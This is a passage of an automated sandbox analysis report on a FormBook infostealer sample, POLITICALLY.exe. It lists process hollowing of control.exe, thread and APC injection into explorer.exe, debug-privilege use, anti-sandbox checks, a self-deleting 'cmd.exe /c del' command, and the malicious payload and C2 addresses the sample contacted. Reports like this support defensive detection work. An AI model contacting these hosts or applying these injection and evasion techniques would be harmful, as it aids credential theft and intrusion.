Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h] 10_2_1E264BAD
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h] 10_2_1E264BAD
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h] 10_2_1E264BAD
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E305BA5 mov eax, dword ptr fs:[00000030h] 10_2_1E305BA5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F138A mov eax, dword ptr fs:[00000030h] 10_2_1E2F138A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E241B8F mov eax, dword ptr fs:[00000030h] 10_2_1E241B8F
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E241B8F mov eax, dword ptr fs:[00000030h] 10_2_1E241B8F
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2ED380 mov ecx, dword ptr fs:[00000030h] 10_2_1E2ED380
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262397 mov eax, dword ptr fs:[00000030h] 10_2_1E262397
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26B390 mov eax, dword ptr fs:[00000030h] 10_2_1E26B390
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h] 10_2_1E2603E2
Enables debug privileges
Source: C:\Users\user\Desktop\POLITICALLY.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\POLITICALLY.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\POLITICALLY.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Users\user\Desktop\POLITICALLY.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\POLITICALLY.exe Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3440
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\POLITICALLY.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\POLITICALLY.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 330000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\POLITICALLY.exe Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe'
Source: explorer.exe, 00000013.00000000.521733147.0000000004F80000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000013.00000002.591577775.00000000008B8000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000013.00000002.593225214.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000013.00000002.593225214.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DC36 cpuid 2_2_0221DC36

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: POLITICALLY.exe PID: 6976, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5548, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY

Behavior Graph:

Behavior Graph ID: 411376
Sample: POLITICALLY.exe
Startdate: 11/05/2021
Architecture: WINDOWS
Score: 100

Process tree recovered from the behavior graph image (node labels kept as shown in the graph; the signatures the graph attaches to each node are listed beneath it):

Start
    Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Potential malicious icon found; Found malware configuration; 7 other signatures
    POLITICALLY.exe (started)
        Signatures: Detected RDTSC dummy instruction sequence (likely for instruction hammering); Tries to detect Any.run; Tries to detect virtualization through RDTSC time measurements; Hides threads from debuggers
        POLITICALLY.exe 6 (started)
            Network: 111.90.149.46, 49744, 80, SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY, Malaysia
            Signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 3 other signatures
            explorer.exe (injected)
                control.exe (started)
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    cmd.exe 1 (started)
                        conhost.exe (started)

Contacted Public IPs

IP             Domain   Country   ASN    ASN Name                                     Malicious
111.90.149.46  unknown  Malaysia  45839  SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY  true

Contacted URLs

Name                                        Malicious  Antivirus Detection    Reputation
http://111.90.149.46/bin_XNLhDlJvG218.bin   true       Avira URL Cloud: safe  unknown
www.nortier.cloud/olg8/                     true       Avira URL Cloud: safe  low